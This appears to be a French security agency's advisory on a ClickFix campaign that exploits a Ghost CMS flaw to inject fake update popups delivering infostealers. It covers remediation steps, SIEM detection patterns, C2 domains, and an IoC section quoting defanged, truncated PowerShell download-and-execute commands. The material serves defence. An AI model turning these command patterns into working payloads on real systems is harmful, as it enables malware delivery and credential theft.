Analyste cybersecurite CMS & applications web — WebGuard Agency
Ghost CMS CVE-2026-26980 : plus de 700 sites compromis via la campagne ClickFix — ce que chaque RSSI francais doit savoir
TL;DR
- CVE-2026-26980 dans Ghost CMS (versions < 5.114.2) est activement exploitee depuis le 22 mai 2026 dans une campagne ClickFix a grande echelle.
- Plus de 700 sites Ghost auto-heberges ont ete compromis : injection de JavaScript malveillant affichant de faux popups « mise a jour navigateur » pour pieger les visiteurs.
- Les victimes sont incitees a copier-coller des commandes PowerShell ou terminales qui installent un infostealer (Lumma/Vidar).
- Correction : mettre a jour vers Ghost 5.114.2+ immediatement, auditer la base de donnees pour des injections, et scanner les themes actifs.
- Les agences web francaises utilisant Ghost pour leurs clients sont particulierement exposees : un seul serveur multi-tenant peut compromettre des dizaines de sites.
— Le contexte : Ghost CMS dans le viseur des campagnes ClickFix
Entre le 25 et le 27 mai 2026, TheHackerNews a rapporte une campagne d'exploitation massive ciblant les instances Ghost CMS auto-hebergees. La vulnerabilite CVE-2026-26980, une faille d'injection dans le systeme de gestion de contenu Ghost, permet a un attaquant non authentifie d'injecter du code JavaScript arbitraire dans les pages publiques d'un site Ghost. La campagne exploite cette faille pour deployer la technique d'ingenierie sociale ClickFix a grande echelle.
Ghost CMS est un CMS open source populaire aupres des createurs de contenu, des newsletters independantes, et des entreprises utilisant une architecture headless. En France, de nombreuses agences digitales deploient Ghost pour les sites de leurs clients : blogs corporate, newsletters sectorielles, portails de contenu. La plateforme compte plus de 45 000 instances actives selon les estimations de la communaute, dont une part significative en self-hosted sans politique de patch automatique.
Le timing est particulierement preoccupant. La campagne a ete detectee a partir du 22 mai, mais les premiers indicateurs de compromission remontent au 18 mai selon certains rapports SOC. Cela signifie que des centaines de sites ont potentiellement ete compromis pendant plus d'une semaine avant que l'alerte ne soit largement diffusee. Pour les RSSI francais, la question n'est plus « est-ce que ca me concerne » mais « combien de mes collaborateurs ont visite un site Ghost compromis cette semaine ».
💡 Notre avis d'expert
ClickFix est en passe de devenir le vecteur d'ingenierie sociale numero un en 2026, devant le phishing par email classique. Le principe est diaboliquement efficace : au lieu d'envoyer un lien piege par email, les attaquants transforment des sites web legitimes en plateformes de distribution de malware. L'utilisateur fait confiance au site qu'il visite, pas a un email inconnu. C'est cette confiance qui rend ClickFix si dangereux.
— Anatomie technique : comment CVE-2026-26980 est exploitee
La vulnerabilite CVE-2026-26980 se situe dans le systeme d'injection de code de Ghost CMS. Ghost offre nativement une fonctionnalite code_injection qui permet aux administrateurs d'ajouter du JavaScript et du CSS dans le <head> et avant </body> de toutes les pages. Cette fonctionnalite est accessible via l'API Admin.
Le probleme : dans les versions anterieures a 5.114.2, une faille dans la validation des tokens d'authentification de l'API Admin permet a un attaquant d'acceder a l'endpoint /ghost/api/admin/settings/ sans credentials valides. L'attaquant peut alors modifier le champ codeinjection_head pour injecter du JavaScript malveillant qui sera automatiquement servi a tous les visiteurs du site.
Le JavaScript injecte fonctionne en trois phases. D'abord, il effectue un fingerprinting du visiteur : systeme d'exploitation, navigateur, langue, presence d'antivirus (via timing attacks sur les requetes locales). Ensuite, si la cible correspond aux criteres de l'attaquant (typiquement Windows + Chrome/Edge + langue francaise ou anglaise), il affiche un overlay plein ecran imitant une erreur navigateur ou une mise a jour obligatoire. Enfin, il fournit a la victime une commande PowerShell a copier-coller dans le terminal « pour resoudre le probleme ».
La commande PowerShell est obfusquee et telecharge un second payload depuis un domaine jetable (typiquement cdn-verify[.]click, browser-update[.]cloud, cloudflare-check[.]site). Ce payload installe un infostealer de la famille Lumma ou Vidar, configures pour exfiltrer les credentials enregistres dans le navigateur, les cookies de session (y compris les sessions authentifiees sur les applications SaaS corporate), les fichiers de wallet cryptocurrency, et les donnees de formulaire remplies recemment.
L'attaque est particulierement sophistiquee dans son ciblage : le popup ne s'affiche pas pour les crawlers (user-agent filtering), les visiteurs depuis des IP connues de securite (VPN de chercheurs, ranges Tor), ni pour les navigateurs mobiles. Cela retarde considerablement la detection par les outils automatises de surveillance.
💡 Notre avis d'expert
Le fait que les attaquants utilisent le systeme natif code_injection de Ghost est un coup de genie tactique. Aucun fichier modifie sur le serveur, aucune anomalie dans les logs de fichiers, tout passe par la base de donnees. Les outils classiques de file integrity monitoring (OSSEC, Tripwire) ne voient rien. Il faut auditer la base de donnees elle-meme, ce que presque personne ne fait en routine sur Ghost.
— 700+ sites compromis : l'ampleur de la campagne
Selon les donnees compilees a partir de multiples sources OSINT et de rapports SOC publies entre le 25 et le 27 mai 2026, plus de 700 sites Ghost ont ete confirmes comme compromis. Le chiffre reel est vraisemblablement plus eleve : beaucoup de sites Ghost sont utilises pour des newsletters internes ou des blogs de niche dont les proprietaires n'ont pas encore detecte la compromission.
La repartition geographique des sites compromis est revelatrice. Les instances self-hosted deployes par des agences web pour leurs clients representent une part disproportionnee des victimes. Un cas typique : une agence qui administre 15 a 30 sites Ghost clients sur un seul serveur, avec une seule instance Ghost en mode multi-tenant. L'exploitation de la vulnerabilite sur le serveur compromet tous les sites heberges.
| Vecteur | Ghost Self-Hosted | Ghost(Pro) Manage | Autres CMS (WordPress, etc.) |
|---|---|---|---|
| CVE-2026-26980 | Vulnerable (< 5.114.2) | Patche auto (24 mai) | Non concerne |
| Injection code_injection | Exploite massivement | Protege par WAF | Risque ClickFix via plugins |
| Detection FIM classique | Contournee (DB only) | N/A (managed) | Detecte si fichier modifie |
| Temps moyen de detection | > 7 jours | < 24h (equipe Ghost) | Variable (2-14 jours) |
| Impact multi-site | Eleve (multi-tenant) | Isole par design | Eleve (shared hosting) |
En France specifiquement, nous estimons que entre 40 et 80 sites Ghost sont concernes, en comptant les agences web, les startups tech qui utilisent Ghost comme moteur de blog, et les newsletters independantes. Plusieurs agences francaises specialisees en content marketing deploient Ghost pour 10 a 20 clients simultanement. Si vous faites partie de ce cas, la priorite absolue est de verifier la version de votre instance Ghost aujourd'hui.
— ClickFix : la technique qui transforme les sites legitimes en armes
ClickFix n'est pas une vulnerabilite technique. C'est une technique d'ingenierie sociale qui exploite la confiance que les utilisateurs placent dans les interfaces de leur navigateur. Le principe est simple et devastateur : afficher un popup qui ressemble a un message systeme (erreur navigateur, mise a jour requise, verification de securite) et demander a l'utilisateur d'executer une commande pour « resoudre » le probleme.
Les variantes observees dans la campagne Ghost CMS incluent :
- •« Votre navigateur necessite une mise a jour critique » : le popup imite l'interface de Chrome ou Edge avec le logo officiel et propose une commande PowerShell a copier-coller.
- •« Erreur de certificat SSL detectee » : le popup pretend que le certificat du site est expire et demande l'execution d'un script de « verification ».
- •« Verification Cloudflare requise » : la variante la plus pernicieuse, qui imite l'interface Cloudflare Turnstile que les utilisateurs voient quotidiennement et associent a la securite.
- •« Ce contenu est restreint » : le popup bloque l'acces au contenu du site et demande l'execution d'un script pour « debloquer l'acces ».
La technique est redoutablement efficace. Selon les donnees de telemetrie publiees par des chercheurs en securite, le taux de conversion (visiteur qui voit le popup vers executio du payload) se situe entre 3% et 8%. Sur un site Ghost avec 10 000 visiteurs mensuels, cela represente 300 a 800 machines infectees. Multipliez par 700 sites et vous comprenez l'ampleur du probleme.
Pour approfondir la protection de vos sites contre ce type d'attaque, consultez notre guide sur comment securiser un site WordPress (les principes de hardening CMS sont transposables a Ghost) et notre article sur comment proteger votre entreprise contre les extensions malveillantes, qui couvre un vecteur d'attaque complementaire.
💡 Notre avis d'expert
Le probleme fondamental de ClickFix, c'est qu'il contourne toutes les defenses techniques : l'antivirus ne detecte rien (c'est l'utilisateur qui execute la commande), le WAF ne bloque rien (le JavaScript est servi depuis le site legitime), et l'EDR voit PowerShell mais c'est l'utilisateur qui l'a lance. La seule defense efficace est la formation des utilisateurs combinee a des politiques d'execution restrictives sur PowerShell. Desactivez l'execution de scripts PowerShell non signes sur tous les postes. Point.
— Plan de remediation pour les administrateurs Ghost
Etape 1 : verifier votre version Ghost (immediat). Connectez-vous en SSH a votre serveur et executez ghost version dans le repertoire d'installation. Toute version inferieure a 5.114.2 est vulnerable. Si vous etes sur Ghost(Pro), votre instance a ete patchee automatiquement le 24 mai 2026.
Etape 2 : mettre a jour immediatement. Executez ghost update pour passer a la derniere version. Si vous utilisez Docker, mettez a jour votre image vers ghost:5.114.2 ou superieur. Testez en staging si votre theme custom utilise des API internes qui pourraient etre affectees par le patch.
Etape 3 : auditer la base de donnees pour des injections. Verifiez le contenu du champ codeinjection_head et codeinjection_foot dans la table settings de votre base de donnees Ghost. Recherchez egalement des balises <script> suspectes dans la table posts (champ html). Les patterns a chercher : cloudflare-update, browser-check, cdn-verify, update.ps1, atob(.
Etape 4 : inspecter les fichiers du theme actif. Comparez les fichiers de votre theme avec une version propre connue (via diff -r ou un hash SHA256 sur chaque fichier). Certains attaquants modifient directement default.hbs ou partials/header.hbs comme vecteur de persistance supplementaire.
Etape 5 : revoquer et regenerer les cles API. Regenerez toutes les cles API Ghost (Admin API key, Content API key, integration keys). Si un attaquant a obtenu une cle Admin, il peut reinjecter du code meme apres le patch.
— Ce que ca signifie pour vous
Si vous administrez des sites Ghost : la mise a jour vers 5.114.2 est non negociable et doit etre faite immediatement. Chaque heure de retard augmente le risque que vos sites soient compromis et que vos visiteurs soient infectes. Un site compromis qui infecte des visiteurs corporate peut generer une responsabilite juridique significative, surtout dans le cadre RGPD et NIS2.
Si vous etes RSSI et que vos collaborateurs visitent des sites Ghost : la menace est indirecte mais reelle. Bloquez les domaines ClickFix connus au niveau de votre proxy/DNS (cdn-verify[.]click, browser-update[.]cloud, cloudflare-check[.]site). Renforcez vos politiques d'execution PowerShell : Set-ExecutionPolicy AllSigned en GPO. Formez vos equipes specifiquement sur ClickFix : aucun site web legitime ne demande jamais de copier-coller une commande dans un terminal.
Si vous etes une agence web utilisant Ghost pour vos clients : vous portez une responsabilite particuliere. Verifiez immediatement la version de chaque instance Ghost que vous gerez. Un seul serveur multi-tenant compromis peut affecter tous vos clients simultanement. Documentez vos actions de remediation : vos clients peuvent vous demander des comptes, surtout si des visiteurs de leurs sites ont ete infectes.
Pour une approche structuree de l'audit CMS, consultez notre guide complet sur comment auditer et securiser un CMS headless contre les exploits ClickFix en 7 etapes.
💡 Notre avis d'expert
Cette campagne est un signal d'alarme pour toute l'industrie des CMS headless. Ghost aujourd'hui, Strapi ou Directus demain. L'architecture headless offre de la flexibilite mais expose une surface d'API plus large que les CMS traditionnels. Chaque CMS headless deploye en production doit etre traite avec le meme niveau de rigueur securitaire qu'une application metier critique : WAF devant l'API Admin, monitoring des modifications de contenu, alertes sur les changements de code_injection, et politique de patch en moins de 48 heures.
— Indicateurs de compromission (IoC)
Voici les indicateurs de compromission associes a cette campagne, a integrer dans vos regles SIEM/EDR :
Domaines C2 et distribution
cdn-verify[.]click
browser-update[.]cloud
cloudflare-check[.]site
chrome-update[.]digital
edge-security[.]online
ssl-verify[.]website
Patterns JavaScript dans code_injection
eval(atob("...
document.createElement('div').innerHTML = atob
navigator.clipboard.writeText
window.__cfCheck = true
Commandes PowerShell observees
powershell -w hidden -c "iex(irm hxxps://...)"
powershell -ep bypass -c "Start-BitsTransfer..."
cmd /c powershell -nop -w hidden -enc [base64]
Votre site Ghost est-il compromis ?
Notre equipe peut realiser un audit complet de votre instance Ghost en moins de 4 heures : scan de la base de donnees, verification des themes, analyse des logs d'acces, et nettoyage des injections. Si des visiteurs ont ete exposes, nous vous accompagnons dans la notification RGPD et le reporting NIS2.
Demander un audit Ghost urgent →— Ce qu'il faut surveiller dans les prochaines semaines
Fin mai - debut juin 2026 : la campagne est toujours active au moment de la publication de cet article. De nouvelles variantes de popups ClickFix sont detectees quotidiennement, avec des domaines de distribution qui changent toutes les 12 a 24 heures. Les instances Ghost non patchees continuent d'etre compromises automatiquement par des scanners.
Juin 2026 : attendez-vous a ce que la technique ClickFix soit portee sur d'autres CMS. Les groupes d'attaquants qui ont developpe l'infrastructure de cette campagne vont la reutiliser sur WordPress (via des plugins vulnerables), Strapi, Directus, et d'autres plateformes CMS. La technique est trop efficace pour rester limitee a Ghost.
Ete 2026 : les consequences secondaires vont se materialiser. Les credentials voles par les infostealers deployes via ClickFix vont apparaitre sur les marketplaces du dark web. Les entreprises dont des employes ont ete infectes risquent des compromissions de comptes SaaS, des acces non autorises a des applications corporate, et des mouvements lateraux dans les SI.
— FAQ
Qu'est-ce que la technique ClickFix utilisee dans la campagne Ghost CMS ?
Mon site Ghost est-il vulnerable a CVE-2026-26980 ?
ghost version dans le terminal de votre serveur et mettez a jour immediatement si necessaire.
Comment detecter si mon site Ghost a ete compromis par ClickFix ?
Quelles sont les consequences pour les visiteurs des sites Ghost compromis ?
Pour aller plus loin
— Pret a renforcer votre cybersecurite ?
Rejoignez les entreprises qui font confiance a WebGuard Agency pour proteger leurs actifs numeriques. Premier audit offert.